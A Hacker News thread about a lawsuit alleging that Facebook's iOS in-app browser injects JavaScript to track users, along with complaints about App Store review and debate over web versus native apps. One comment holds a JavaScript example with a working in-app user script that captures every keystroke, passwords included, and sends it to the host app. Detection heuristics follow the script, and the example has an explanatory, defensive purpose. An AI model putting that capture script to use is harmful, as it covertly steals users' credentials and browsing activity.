Facebook sued for skirting Apple privacy rules to snoop on users (bloomberg.com)
370 points by JumpCrisscross on Sept 22, 2022 | 124 comments


Yes, I understand why Apple doesn't pull FB/IG/WA/Uber/etc but as a smaller developer it's incredibly frustrating to have the full rules applied to me but not the big players.

A week or two ago I had to fight with app review over some functionality that was behind a login screen (they thought it should be public, I disagreed) and for my pre-permission-request screens (you know, the screen almost every app shows before firing the system prompt). Turns out you can have that screen but you can't ask a question on that screen or offer a way to dismiss and not get the system dialog. That was news to me since I had seen countless "Do you want to enable push notifications (yes|no)?" screens in top apps but that rule has changed and no longer allows you to pre-ask. I complied but the very next day I opened an app from a billion dollar company and I got a pre-ask that I was able to dismiss without popping the system dialog. wtf...

Why am I expected to bend over backwards for app review when these serial abusers get a free pass (no ban AND they can do things smaller apps get slapped down for)?

I know the answer is "money" but I fucking hate it.


> but that rule has changed and no longer allows you to pre-ask. I complied but the very next day I opened an app from a billion dollar company and I got a pre-ask that I was able to dismiss without popping the system dialog. wtf...

Apple enforcement on rule changes has several different options:

a) only applied to new apps

b) only applied on next app submission

c) app will be removed on date unless it's fixed

This sort of change seems likely to be in category A, and then over time will be in category B and eventually the billion dollar apps will get an update denied until they fix it. They may drag their feet a little or a lot first.

Some of the subjective review things will get flagged only sometimes, so you might get through if you resubmit with no changes, or if you only address some of the requests. Inconsistent enforcement is frustrating, of course.


I know this is the case for certain changes such as allowing users to delete their accounts. I remember the new apps/updates being bifurcated with updates being allowed for a few months after it went into effect for new apps but for this system dialog change I'm not aware of anything being said publicly about this, I think the rules just changed internally. My google-fu might be failing me but I can't even find articles about this change. It was news to me (it's in the HIG, not in the guidelines) when we got hit with it and normally I keep abreast of any new requirements/rule-changes and when they go into effect.

I completely understand and agree with the different options you outline but I don't think that was done in this case, at least publicly. Please, if I'm wrong and someone has a link to an article about this I'd love to see it/know about it.


My life has improved immeasurably since I gave up iOS dev and went back to the web. My baseline frustration level is so much lower.


That might be a viable path if not for push notifications and the fact that companies want an app more than anything. I've used cross platform frameworks in the past and had the web version up and all I hear is "when app?", even though it's the same codebase, same look, sometimes without even leveraging anything like push notifications or other app-only features. They literally will not even look at the web version. I've proven this over 10+ different companies. I deliver the web version, then I get started on app store hell and only after the app (iOS is all they often care about, at least at the start) is out do they start giving feedback. It's frustrating since they normally have had access to the identical web version for weeks but they just don't care.

I love the web, but users and companies just want apps, and I want to get paid.


Push Notifications will arrive next year. As will one-click install. A PWA can accept payments via Apple Pay. Yes, monetization is more challenging with a web app, but ultimately your value proposition is about how many eyeballs your app has - so the faster you can get to many eyeballs the better.

As for building apps for clients - I find just the opposite to be true. They don't want to be subject to the whims of the review process. They just want to deliver their service to their users.

What users think is not really relevant. They'll use it if they have to or if their friends are using it.


I haven’t tried sending push notifications to iOS over web yet but this should be possible since iOS 16 [1] because they introduced “web push”. According to Apple, it works cross-browser, even if the browser was killed by the user, and you are not required to have an Apple developer account.

[1] https://developer.apple.com/documentation/usernotifications/...


That feature isn't coming out till 2023 in a later iOS 16 release. We will see if that moves the needle but like I said in a comment below [0], even when push notifications aren't part of the conversation companies still just want apps.

[0] https://news.ycombinator.com/item?id=32939559


Isn't it distressing that it took Apple over a decade to realize Steve Jobs' vision of simple apps on the web? I wonder what's taking them so long...


It didn't though. Steve Jobs’ vision of simple web applications was realised with the first iPhone. Native applications added to that, they didn’t take it away.

This idea that web applications only “count” if they can send push notifications is bizarre. You know everybody was building web applications just fine without push notifications before 2009, right? And that native iPhone applications didn’t have push notifications either to begin with?

Just because Apple added push notifications to native iPhone applications, it doesn’t mean that all web applications suddenly ceased to be “real” applications because they couldn’t do it yet.


I mean even Jobs turned around pretty quickly on the idea of PWA. I doubt even he championed it after iOS 2+.

I'm still not sure if the PWA push was the plan and they changed to the app store or if it was always something to tide people over. I believe the reporting has said they honestly thought PWAs would be good enough and then reversed course but it didn't take them long before they just went all-in on apps.

All that said I'm not really a "the web should be able to do everything apps can do"-guy, I think the constant permission requests would be incredibly tiring while browsing the web. Though maybe you, as a user, would need to first "promote" or "whitelist" a url before it could even ask. Idk, just sounds like hell.


The problem is that Apple isn't investing in a platform for everyone. As such, they're liable to get their ass whooped by antitrust suits time immemorial until they either -

1. Make the web a suitable platform for application delivery

- or -

2. Allow third-party alternatives to the App Store

Apple doesn't like it. No shit, their shareholders would throw a riot if they abandoned their 80-billion/year cash cow. Unfortunately, that exploitation is a very real consequence of first-party vendor abuse that we shouldn't have allowed to happen in the first place. Microsoft tried making the web into their "App Store" a few decades ago, and they were rightfully sued into oblivion and beaten with rolled-up newspapers. We should have done the same thing to Apple before they became so self-entitled.

If you don't want to use the web for apps, then don't. I'm sure Apple would be happy for you to spend that money on the App Store instead, where they can happily take their cut. But consumers need the option. That's just not up for debate. Apple will kick and scream and make it as ugly as possible, but that's purely because they're facing technologies that threaten their business model as they know it. How long can they continue to do this before the dam bursts?


So stop developing for such a crappy closed platform?!?


Interviewer at Generic iOS Contractor Co.: “OK, we’ll hire someone else.”

*Interviewee exits, pursued by a door*

Interviewer: “HR? Yes, please make a note not to offer that candidate any other roles, thanks. Yeah, for some reason they seemed to think their personal preferences were more important than solving our customer needs. Would be a terrible fit.”


Please note candidate didn't like Nazis and we want people loyal to the company above all personal morals.


Christ on a bike, I was being facetious, but if you tried that argument in a job interview as a reason why the job on offer was inherently wrong I would call security so someone could watch you at all times while making sure you left.

Places which make me feel the way that you’re describing, I don’t even reply to the recruiter.


Why do companies want an app?

Is it just for telemetry? Just for push notifications? Just because their competitor/idol has an app and they want one too?


Drives me nuts that even just websites, like Reddit, push so hard to get you to install their app.

I think it is not primarily related to notifications and telemetry, although that's obviously part of it, or to access to your contacts or whatever, like in the case of FB. My theory is that it's much simpler and dumber than that: that "number of app installs" has simply become a metric that managers can use to promote themselves inside a company, and that companies can ultimately use to sell shares. It's an engagement metric, and since there is no metric for "home screen bookmarks made", there is no way for companies and managers to gamify the web site. Therefore, they simply don't care about the website, except as a means to get you to install the app. It's all a bullshit numbers game.


That redesign to the new shittier reddit and their push to their dumb app was the second shark ollie over there.


Because web-based apps don't have a good user experience. Even a web app embedded inside of a native app feels bad. Maybe it's something about WebKit specifically that feels bad, but there is a very noticeable difference between a web app and a native app. Part of the issue is the thread model. Touch events come in on the app's main thread, and then those touch events get dispatched on to the JavaScript thread, and then the JavaScript thread needs to dispatch to yet another thread to render. It's just impossible to achieve native-level touch interactions in a web-based app.

And then there is the polish level. Apple has spent god knows how long polishing each and every native interaction. All the animation curves are perfect. You lose all of that polish when you build a web app.


> Why do companies want an app?

It's not for telemetry (at least at the scale/size of companies I deal with). As far as I can tell it's the prestige. I know this because our initial app had no push notifications and the clients who paid for it wouldn't stop asking about an app and didn't even touch the (identical) web version.

Push notifications are part of it for sure but I just wanted to give an example of a case where there were no features that were app-only but all they cared about was the app. I'd say "Yeah, we have that new feature and you can see it at yourbrand.ourcompany.com" and they'd say "Ok, when will we have an app?", felt like I was taking crazy pills but I've seen this exact same conversation repeated at multiple companies, multiple clients. And lest someone think this is a subdomain-related thing, it's not, I had the same questions when we set up the web version at theirdomain.com.


AFAIK this is a bunch of the most common reasons, somewhat ordered from most-important to least-important.

1. It puts an icon on your phone's home screen which reminds you it is there and encourages reuse.

2. They can put notification counters on said home-screen icon.

3. It is generally easier to convince people to enable notifications on the app than on the website.

4. User perception. Some users expect an app and look down on a website. (Even if functionally identical)

5. Blocking ads on websites is much easier than blocking them on mobile.

6. It can provide better tracking and analytics.

7. The app can provide a better experience.

7a. The ability to pre-download the application makes it less costly to provide more features and code. The just-in-time downloading of web applications means that the size of code, data and resources generally needs to be more carefully considered. Of course you can do careful code loading for webapps but it requires custom code instead of being managed by the store.

7b. Native apps generally have access to more APIs especially without needing to request special permission (contacts, device sensors, large amounts of storage, etc)

7c. Access to native UI toolkits can make the application fit into the expected UX better.


Apps are easier to use than a browser. The flow of installing an app from the app store, and having an icon on the home screen, makes a lot more sense than opening a browser and navigating to a URL.


Also, an app is there, with an icon on the home screen to remind the user of its existence. I think this makes future use more likely than if the user just entered the address, and even more than with a bookmark that is visible only in the browser.

I know the users can create the icon themselves by saving a bookmark to the home screen, but for some reason they seem not to.


Web browsers still have some remnants of being a “user agent”. Apps, by contrast, are agents of their creators, no one else; certainly not the user.


I've switched to working on other kinds of apps, more rich desktop kinds of apps. I enjoy this a lot more too since most mobile apps are pretty dumb and gimmicky.

Of course if you're doing client work you have to build what your clients are asking for and yeah the web is not a substitute for native in all cases.


Or find different clients.


I did the same. Dealing with Apple was an endless source of frustration.


It seems that the golden age of apps is coming to an end. One of my many apps gets banned daily by Google due to some silly rule interpretation, which among them include what seems to be punishment for using an ad provider different from AdWords or whatever they call it now.


FB did once have their developer certificate revoked by Apple: https://arstechnica.com/gadgets/2019/01/facebook-and-google-...


Right but that was just their enterprise cert and didn't affect their big apps, only internal apps and their gross VPN apps (which they were distributing via enterprise cert to get around app review).


> Turns out you can have that screen but you can't ask a question on that screen or offer a way to dismiss and not get the system dialog. That was news to me since I had seen countless "Do you want to enable push notifications (yes|no)?" screens in top apps but that rule has changed and no longer allows you to pre-ask.

We regularly (multiple times per month) launch new applications in new Apple developer accounts where we present a screen explaining what notifications we send and two buttons, one of which says “Notify me” that triggers the system permissions prompt, and one of which says “Not now” and continues without triggering the system permissions prompt.

I’m not sure of the precise difference Apple sees between what you are doing and what we are doing, but this is not a roadblock for us, so perhaps copy that approach more closely and Apple will relax a bit?


I'm in the exact same boat as you. It's a whitelabel app that we have launched many times in the past on new Apple Developer accounts but we just randomly got hit with this. Our screen also said "Enable Location" or "Not now" but that wasn't satisfactory. If you look at the "Pre-alert screens" section of this HIG document [0] you will see even your way of doing it isn't allowed but with all things app review, it's a game of roulette if the reviewer notices/cares. I've run into this before where I set up 2 apps within days of each other, different accounts, same core code base, and one gets dinged in review and the other doesn't.

I've shipped new apps that didn't have the ability to delete user data well after Apple's deadline and some sneak through ("sneak" but I wasn't trying to sneak, I just forgot to add it to one of my apps, I quickly added it in the next update so I didn't run into a brick wall later if they noticed) and some are caught.

[0] https://developer.apple.com/design/human-interface-guideline...


I have to admit my bias up front -- as a user, I hate pre-alert screens in general. But this wording:

> Our screen also said "Enable Location" or "Not now"

is one of my pet peeves. It's that "not now" that does it for me. The lack of a "No" option, and having a "not now" option, is a big red flag to me. At best, it's just manipulative. At worst, it hints that I'm going to keep getting asked about it over time.

Either way, it's removing the ability to say "no", which feels scummy.


Exactly this thing triggers me as well. If you have a "Not now" option, give us a "Not ever" option as well. Or have you run out of buttons?

Same with the "No, thanks" button on dialogs that are expected to be denied most of the time (plz subscribe to our newsletter). Sometimes I wish there would be a "No, f*ck off" button next to it, but I feel it's kinda the developer's loss for not being willing to collect sentiment feedback. Or just give me a "No" button, but I am not thankful for being forced to dismiss your nagging.


It’s understandable to feel that way, but it tells the user that this decision doesn’t have to be permanent and makes it easier to say no if they aren’t sure. Remember that if you say no to the system permissions prompt then it can’t be shown again, and this is embedded in a lot of people’s brains – “use it or lose it”. “Not now” is a way of taking the pressure off to stop them getting stuck on that screen, and also pretty idiomatic at this point.


Apple are definitely inconsistent in how they apply their rules but we’ve never had to tweak this screen as far as I know, across several hundred applications. Maybe it was a one-off?

In my experience, Apple don’t really reject things based on the HIG any more. Last time they did for me was back in 2008. If they rejected things based on the HIG, they’d reject almost everything – look at how many applications abuse launch images to show a splash screen, for instance.


Agreed. I supported a relatively large retail app (about a million users) with a team of 5-8. Apple review process was always a risk. I've had times as well where my submission was denied, but in the appeal process would point to a larger app that did the same thing and it would rarely help.


The reply I got when I pointed at other apps was "Please file a report via the App Store, other apps not following the rules doesn't give you a free pass". :rolleyes:

I also once got told (on the phone with a reviewer) that I couldn't say

    Allow "My App" to use your location?
In the title of the permission dialog because I was "leading" the user to allow. Never mind that the title of that dialog is system-generated and you can only edit the description that shows underneath. I went 3-4 rounds with the reviewer saying I didn't control that while they insisted I did/could. I finally gave up, made 1 other change they requested, then resubmitted and it went through. Reviewer roulette sucks.


This sounds like classic anticompetitive collusion between monopolies to me.

If this behavior really is common, I suggest complaining to the relevant authorities.


I know you are trying to be helpful but I can't stop laughing. There are no "relevant authorities", it's Apple/Google's way or the highway. Even if there were "relevant authorities" I don't have the funds/time to buy the justice I want.


There are multiple antitrust cases underway against both those companies.

I'm sure the parts of the EU trying to block Facebook spying and outlaw app stores would be extremely interested, for example.


I just got back from a trip where I was visiting a lot of older relatives and every one of them now has an iPad where about 40-70% of their usage is FaceBook. In a battle between Apple and Meta I honestly wonder who would blink first but my money would be on Meta. Apple has already made their money and the primary FaceBook audience isn't rushing out to buy a new iPad every year, whereas losing complete access to the Apple market would immediately have a huge impact on Meta's bottom line.


For what it’s worth, I know FB/IG spies on me and avoid installing their apps, whereas I’d feel much safer with a small app like yours.


Counter argument - small apps _usually_ have much more trackers, coming from many different sources. As a result, your data is syphoned to many dozens of entities, and each of them faces less scrutiny than FB/IG.


Small apps should face less scrutiny than billion dollar companies. It's much easier to regulate Segment, Google and Facebook than doing it to every small business in America.


From a regulations point of view - sure. Which is also the reason why big tech is generally better with privacy, as weird as it may sound.

If you care about privacy, small apps are much more dangerous (on average of course).

Have you seen data practices from smaller data brokers vs big tech?

Big tech uses your data, but they try to protect it (with various levels of success), as it’s more valuable to them. Small data brokers literally sell everything (and not like big tech, where they sell you services that utilize it, but raw data) they can, directly, to anyone.


That sounds like what Google's PR department would say, right before their lobbying arm turns around and promotes a data privacy law that absolutely obliterates citizen rights. The smaller data broker can't afford the privacy-compromising lobbyist department, so I would still rate them less dangerous for privacy overall. I'm not even sure the big companies do a better job, it's certainly more damaging when it goes badly (e.g. Equifax)


Google and Facebook are pretty good about letting you control your data. You can delete it, not have it stored, not have it used, etc.

Reddit is terrible, and Twitter is middle ground.


Same here. I only use Facebook and IG websites on mobile.


> or offer a way to dismiss and not get the system dialog.

I wish it was applied fairly, but I am thankful for that rule, because it reduces the amount of “soft requests” where the app will continue to pester me relentlessly about enabling access to my contacts or something


I see both sides here. It'd be different if I didn't hear from clients/users about how they can't get the push/location/etc feature to work only to find out they dismissed/denied the initial request. I have code I move from project to project to handle the soft-request and to handle the "you denied the system request, let me guide you to where you need to go in settings to fix this". Turns out my soft-request code goes against the rules (ok, that's fine, I just wish it was constant) so I'll remove that but getting only 1 try to request is rough (though I agree it would be worse if apps could request that an unlimited number of times). I don't know what the good middle ground is here, maybe 1 request is the middle ground.
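One compliant shape for the flow this comment describes (an explainer screen whose only forward path is the single system prompt, and a Settings deep-link once the OS has recorded a denial), written as an added Swift example and not the commenter's own code. The nearby-stores copy, the class and enum names, and the alert wording are assumptions; the app also needs an NSLocationWhenInUseUsageDescription entry in Info.plist for the system dialog to appear at all.

```swift
import UIKit
import CoreLocation

/// What the map page should do next, derived only from the OS-reported
/// authorization state. There is deliberately no "dismiss without the
/// system prompt" branch: the explainer always leads into the one-time dialog.
enum LocationPromptStep {
    case showExplainerThenSystemPrompt   // .notDetermined: the only chance to ask
    case guideToSettings                 // .denied: iOS will not prompt again
    case explainRestriction              // .restricted: MDM/parental controls, user cannot change it here
    case proceed                         // already authorized
}

/// Pure decision function so the branching can be unit-tested without UIKit.
func nextStep(for status: CLAuthorizationStatus) -> LocationPromptStep {
    switch status {
    case .notDetermined:                          return .showExplainerThenSystemPrompt
    case .denied:                                 return .guideToSettings
    case .restricted:                             return .explainRestriction
    case .authorizedWhenInUse, .authorizedAlways: return .proceed
    @unknown default:                             return .guideToSettings
    }
}

/// Hypothetical helper owned by the map screen; created when the user opens the
/// map, not at launch, so the request is tied to the feature that needs it.
final class NearbyStoresPermissionFlow: NSObject, CLLocationManagerDelegate {
    private let manager = CLLocationManager()
    private weak var host: UIViewController?
    private let onAuthorized: () -> Void

    init(host: UIViewController, onAuthorized: @escaping () -> Void) {
        self.host = host
        self.onAuthorized = onAuthorized
        super.init()
        manager.delegate = self
    }

    func start() {
        switch nextStep(for: manager.authorizationStatus) {   // instance property, iOS 14+
        case .showExplainerThenSystemPrompt: presentExplainer()
        case .guideToSettings:               presentSettingsGuide()
        case .explainRestriction:
            presentAlert(title: "Location unavailable",
                         message: "Location access is restricted on this device, so nearby stores cannot be shown.")
        case .proceed:                       onAuthorized()
        }
    }

    /// Explains why we ask. The single button always fires the system dialog,
    /// so the user is never left with a silent "dismissed" state we would re-ask about.
    private func presentExplainer() {
        let alert = UIAlertController(
            title: "Find nearby stores",
            message: "We use your location only while the map is open, to list stores near you.",
            preferredStyle: .alert)
        alert.addAction(UIAlertAction(title: "Continue", style: .default) { [weak self] _ in
            self?.manager.requestWhenInUseAuthorization()   // the one-time system prompt
        })
        host?.present(alert, animated: true)
    }

    /// After a denial the OS will not show its dialog again; the fix lives in Settings.
    private func presentSettingsGuide() {
        let alert = UIAlertController(
            title: "Location is turned off for this app",
            message: "To see nearby stores, enable Location for this app in Settings.",
            preferredStyle: .alert)
        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
        alert.addAction(UIAlertAction(title: "Open Settings", style: .default) { _ in
            if let url = URL(string: UIApplication.openSettingsURLString) {
                UIApplication.shared.open(url)
            }
        })
        host?.present(alert, animated: true)
    }

    private func presentAlert(title: String, message: String) {
        let alert = UIAlertController(title: title, message: message, preferredStyle: .alert)
        alert.addAction(UIAlertAction(title: "OK", style: .default))
        host?.present(alert, animated: true)
    }

    // MARK: CLLocationManagerDelegate (iOS 14+)
    // Fires after the system dialog closes and when the user returns from Settings.
    func locationManagerDidChangeAuthorization(_ manager: CLLocationManager) {
        if nextStep(for: manager.authorizationStatus) == .proceed { onAuthorized() }
    }
}
```

Because `nextStep(for:)` is pure, the denied-then-Settings path and the restricted path can be asserted in a unit test without presenting any UI.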


It might not work on iOS, but at least on Android one trick is to accept the "soft" request, and then reject the OS dialog.


I actually specifically decided not to start any app companies because of the risk inherent with being on the App Store. Apple wield their power too heavy-handedly. I’ve been affected by it at my last couple of jobs where Apple just stonewalls or otherwise makes a complete mess of trying to get something in the App Store. It’s too much platform risk. They’re starting to push innovators away.


Imagining myself getting the same treatment as Facebook - as an indie dev, I prefer my app to get rejected rather than deal with a lawsuit of that magnitude. Complying with App Review guidelines is a small effort, after all.


Removing text seems like an incredibly minor change request.


> Removing text seems like an incredibly minor change request.

Can you expand on this? I'm not exactly sure what you mean. To clarify, I had 2 issues:

* App review thought part of my app should not be behind a login screen; the data on this screen was fetched via our API and was authenticated (not a super easy change to expose that, and we don't expose it to unauthed clients on purpose).

* Our app asked the user if they wanted to allow location access to see nearby stores on our map page (only asked when they went to the map page). We didn't pop the system dialog unless they agreed first to our own permission prompt (since you can only pop the system dialog once). This is against the rules now, which is fine, my frustration stems from continuing to see this practice everywhere.


> This is against the rules now, which is fine, my frustration stems from continuing to see this practice everywhere.

This kind of sounds like being mad that the cop pulled you over for speeding, despite everyone else also speeding. I know it sucks and it feels like you're being singled out, but generally "everyone else is breaking the rule, too" has never been convincing to rule enforcers.

I worked at a company that always tried to walk the line right up to the edge of Apple's rules, and unsurprisingly kept running into trouble with app reviews. The company kept wanting to dig in and fight because "our_competitor does the same thing". My advice was always that it's pointless, and we'd be better off just concentrating on our app and fixing it.

At this point in my career, I almost feel like I could make money simply being an "AppStore Rules Consultant" who flies into a company, says "Just Do What Apple Said In Their Message!" and take home my fee.


> This kind of sounds like being mad that the cop pulled you over for speeding, despite everyone else also speeding.

It's a little closer to being pulled over in a Honda Accord with 200K+ miles on it going 71 in a 70 zone while Teslas and BMWs fly by at 90+. Also those Tesla/BMW owners have had hundreds of tickets but somehow keep their licenses.

Yes, I know this is actually probably completely/near accurate to the real world, money runs everything, but it doesn't mean I have to be ok with it. I'm not advocating I should be allowed to "speed", just that it's frustrating to be the only one getting pulled over with (ok, I've stretched this metaphor as far as I can stand) a tiny dev team while billion/trillion dollar companies, for which my entire team is less than a rounding error, get away with murder.


The problem is that the rules are enforced differently based on the reviewer you get, and how s/he feels that day. This is blatantly obvious after having dealt with reviewers for more than 3 submissions.

So that cop who pulled you over? Did he have a bad day with his wife that morning? You’re getting a ticket. Tomorrow? Possibly not.


> This kind of sounds like being mad that the cop pulled you over for speeding, despite everyone else also speeding. I know it sucks and it feels like you're being singled out

It's different when every single app gets a review and these behaviors can be controlled at a bottleneck.

Your analogy is more apt if Apple decided they would only display websites that did X. And websites might pretend to do X for a little while, and then quit. And there's billions of them, not enough enforcers, and no simple bottleneck where they pass/fail BEFORE being released.


It might be if your only language is English. If not, it requires going back and getting translations done again. And it's not necessarily as easy as just removing the offending text. Text is very contextual, and the removal of some text might necessitate changing other text.

I'd not want to suggest that something is "minor" in a system I'm not familiar with.


A little while back I recall some pundit describing Facebook as believing that this kind of data was theirs. Not “theirs for the taking”, but literally if they could find a way to obtain it, they considered it their right to have it. Like it was baked into the culture of the company. The more I read about Facebook’s practices, the more it rings true.


IIRC, Facebook got its start by scraping student data from university servers. If so, the belief that any data it can get its hands on is fair game pretty much is the foundation of the company.


Zuckerberg and a lot of tech/SM CEOs have a strong "rules for thee, not for me" vibe when it comes to personal privacy. One day they'll claim "privacy is outdated" or "a matter of context" in relation to their business, and the next they'll spend fortunes to protect and insist on personal privacy for their family and themselves. One can only imagine that billions they make do a lot to paper over the ethical void at the heart of many of the businesses under their control.


They act like classic spies. Spies will eagerly take all data they can touch, but loathe giving any data about themselves. Personally I think this superficial similarity reflects a more meaningful underlying truth: Facebook, and several of the others, are in fact a commercial branch of the US intelligence apparatus.



Yeah, but specifically Zuckerberg. He's never cared about other people


Exactly why I consider Facebook to be a monstrously overgrown malware that was allowed to become a corporation.


Yes. Facebook was a skeezy company at the start, and has never stopped being so.


There was a belief for a time that consumers no longer cared about privacy, that the millennial generation preferred to share everything, and harvesting data was fine because the concept of privacy was antiquated.

What surprised a lot of tech execs was that when people understood how much data was collected they got creeped out and when given the option to opt-out of data collection they agreed at very high rates.

Apple's move to limit in-app tracking was genius because any lawsuit from FB or similar is counter-productive - consumers are given the option and they opt out at 99%. Suing Apple to force them to let FB track consumers would be a PR disaster.


>There was a belief for a time that consumers no longer cared about privacy, that the millennial generation preferred to share everything, and harvesting data was fine because the concept of privacy was antiquated.

It's not like this is wrong. If you give consumers the choice of paying $5/month directly for some service vs. providing $5/month in personal data then they'll pretty much always choose the latter - I don't believe this has changed.

What has changed is that now third parties are better able to stop companies like Meta from silently harvesting personal data as a default, and consumers generally don't mind this because they see the result as them getting to use the data-harvesting websites for free. Just like they're happy to use adblockers even if that collectively results in sites having to use heavy-handed subscription policies. If you give people the option to free ride, it's not surprising that they do it.


Anecdotally every non-tech person I know gives literally zero Fs about their data/privacy. They're FAR more annoyed by the cookie / tracking pop-ups than what they represent, and would generally opt to just be tracked everywhere than be annoyed with the question. I'd also say that the majority of my tech friends feel about the same, and do not care, and have the "I have nothing to hide / who cares if they see my boring life" attitude.


What about if you film them in public? I’m sure those same people would care a lot, they just understand things differently. If there was more of a sensory experience to having your data/privacy invaded, such as someone putting a camera up to your face - then non-tech people would get it.


Depends what you mean by that. If you mean someone in their face with a camera or microphone. Then, yeah I'd agree they would be upset. However, pretty much everyone walks into stores daily that record video/audio, and have signs informing people of it. No one seems to care.


Have you ever read Yertle the Turtle by Dr. Seuss? It’s the story of a turtle who considered himself “the king of all that I can see,” and kept building a tower of turtles higher and higher to see more, and thus rule more…


Ironically, if Yertle had used the metaverse, he could have kept the illusion going indefinitely and would have remained happy. While the other turtles could have gone happily about their daily lives, because it turns out they never needed a king and all he did was burden them with his vanity projects.

I think we can apply this in real life with advanced AI bots, from whom Meta's advanced scraping software can gather data which can then be used to show the bots relevant ads.


“It is difficult to get a man to understand something, when his salary depends on his not understanding it“


It doesn't seem like there are ANY rules at Facebook.

They put out a vpn app targeting kids ... and when told not to do that they renamed it and put it back on the store a little while later.

If they can get it they'll do whatever it takes.


Of course it's baked into the culture of the company. The CEO famously called his users "dumb fucks"[1] for trusting him with their data. As far as I'm concerned there's no reason to think his basic attitude has changed. Just the messaging has gotten better.

[1] https://www.esquire.com/uk/latest-news/a19490586/mark-zucker...


> The CEO famously called his users "dumb fucks"[1]

The sourcing for that claim is extremely poor. The Esquire article links to a Business Insider article from 2010, which in turn cites "anonymous sources" on a 2004 IM conversation:

> According to SAI sources, the following exchange is between a 19-year-old Mark Zuckerberg and a friend shortly after Mark launched The Facebook in his dorm room


Amendment: the Esquire and SAI sourcing is poor, but the New Yorker is more credible on this point, partly because it interviewed Zuckerberg. See https://news.ycombinator.com/threads?id=jbullock35#33099479.


Sounds like an iteration of "might is right".

https://www.merriam-webster.com/dictionary/might%20is%20righ...


If an app needs a webview, it should always strive to open that view in an embedded Safari webview (called an SFSafariViewController) or link to the view in the user's own choice of browser. The app is prevented from seeing ‘inside’ this view.

Sometimes an app needs to control some aspect of the external view - for instance listen to some Js event, or inject authorization - and this can be for totally legitimate reasons in the flow of the app. Then the application needs to use another type of embedded webview called a WKWebView, which by definition allows the app to see into the user's interactions in the embedded browser.

Most developers and apps use these for totally necessary reasons - but Facebook is deviously abusing this functionality.

Some of the posters in this thread are blaming Apple for Facebook's evil behavior, but a lot of totally legitimate functionality that needs this type of app/browser communication would be impossible without the ability to enable it for genuine and well-founded reasons.
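What the app/page bridge described above actually gives an app, shown from the web page's side. This is an added example written for this thread; it is not code from the article, from Meta's apps, or from Felix Krause's report. Part 1 is the kind of script a WKWebView host can run on every page it loads (in Swift via WKUserScript); it reports keystrokes and link clicks to the native side through `window.webkit.messageHandlers`, a bridge that exists only inside WKWebView and never in Safari or SFSafariViewController. Part 2 is a set of heuristics a website can run to notice it is inside such a browser and that scripts it did not ship are present. The handler name `tracker`, the host allowlist and the snapshot layout are assumptions made for the example.

```javascript
// Added example, not code from the article, Meta or Felix Krause's report.

// ---- Part 1: an app-injected user script of the kind the thread discusses ----
// A WKWebView host can add this to every page (WKUserScript, all frames).
// "tracker" is an assumed name for the app's WKScriptMessageHandler.
const TRACKING_USER_SCRIPT = `
(function () {
  var wk = window.webkit && window.webkit.messageHandlers;
  var bridge = wk && wk.tracker;
  if (!bridge) return;
  var report = function (kind, extra) {
    bridge.postMessage(Object.assign({ kind: kind, url: location.href }, extra));
  };
  // Capture phase on "input": sees every keystroke in every field, password
  // fields included, before the page's own handlers run.
  document.addEventListener('input', function (e) {
    var t = e.target;
    if (t && t.tagName === 'INPUT') {
      report('input', { name: t.name, type: t.type, value: t.value });
    }
  }, true);
  document.addEventListener('click', function (e) {
    var a = e.target && e.target.closest && e.target.closest('a');
    if (a) report('click', { href: a.href });
  }, true);
})();
`;

// ---- Part 2: what a page can detect about its host ----
// Caveat: the page's Content-Security-Policy is not applied to scripts the
// embedding app injects, so a site can detect, not prevent, this.

// Reduce the live DOM to a plain snapshot (the test constructs one by hand).
function snapshotPage(doc, win) {
  return {
    origin: win.location.origin,
    // The bridge object only exists inside an app-embedded WKWebView.
    hasWebKitBridge: Boolean(win.webkit && win.webkit.messageHandlers),
    scripts: Array.from(doc.querySelectorAll('script')).map((s) => ({
      src: s.src || '',
      text: s.textContent || '',
    })),
  };
}

function scriptOrigin(src) {
  try { return new URL(src).origin; } catch (e) { return ''; }
}

// allowedOrigins: hosts the site legitimately loads scripts from (assumed).
// Returns findings in document order, WKWebView signal first.
// Limitation: a user script that never touches the DOM leaves no <script>
// element behind, so only the bridge signal catches it.
function analyzeSnapshot(snap, allowedOrigins) {
  const allowed = new Set([snap.origin, ...allowedOrigins]);
  const findings = [];
  if (snap.hasWebKitBridge) {
    findings.push({ signal: 'wkwebview',
      detail: 'window.webkit.messageHandlers present: page is inside an app-embedded WKWebView' });
  }
  for (const s of snap.scripts) {
    if (s.src) {
      if (!allowed.has(scriptOrigin(s.src))) {
        findings.push({ signal: 'foreign-script', detail: s.src });
      }
    } else if (/webkit\.messageHandlers|postMessage/.test(s.text)) {
      // Inline script talking to the native bridge: not something this site shipped.
      findings.push({ signal: 'inline-bridge-script', detail: s.text.trim().slice(0, 60) });
    }
  }
  return findings;
}

// In a real page: analyzeSnapshot(snapshotPage(document, window), ['https://static.cdn.example'])
```

A site that sees the `wkwebview` finding on its login page can at least warn the user, or refuse to submit credentials, which is the only defensive move left to it; the injected script itself runs with the same visibility as the page's own code.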


If "skirting Apple privacy rules" amounts to opening a web link, then it absolutely is Apple's fault. If Apple provided SFNextPaymentsInformationExporter, and a malicious app used that nefariously, and then the app was approved, that's entirely on Apple.

If Apple wants to advertise security and privacy, as well as enforcing App reviews, then I consider that to be enough to hold them accountable if they fail their advertised promise. Apple did not respond by removing the offending app from their store either.



> The Facebook app gets around Apple privacy rules by opening web links in an in-app browser, rather than the user’s default browser, according to Wednesday’s complaint.

TikTok does the exact same thing.


Just like Google getting fined, not even Facebook (Meta) should be allowed a pass on trying to escape this evasion and continuing to violate user privacy and collect more personal identifiable information (PII).

As soon as they lose, they should be fined in the multi-billions of dollars again, much higher than the FTC fine that they got years ago.

Given that they won't ever change, the fines should just get higher.


>> The suits are based on a report by data privacy researcher Felix Krause, who said that Meta’s Facebook and Instagram apps for Apple’s iOS inject JavaScript code onto websites visited by users. Krause said the code allowed the apps to track “anything you do on any website,” including typing passwords.

Does it mean that Facebook can exfiltrate users’ passwords for any website?


Yes, if you open it in the in-FB-app browser and log in.


Sure this sucks, but it's the in-app browser. Probably totally follows Apple's rules.


>probably totally follows apples rules.

I've only ever used Android, so I'm ignorant here to how iOS operates and, to a certain extent, the rules Apple has in place around this sort of thing. I would think, though, that this sentence is key:

>The Facebook app gets around Apple privacy rules by opening web links in an in-app browser, rather than the user’s default browser, according to Wednesday’s complaint.

If FB is supposed to follow iOS settings by opening links in the default browser set by the user, but is intentionally not doing that here so that they can maximize the data they collect, then yeah they'd be breaking rules.


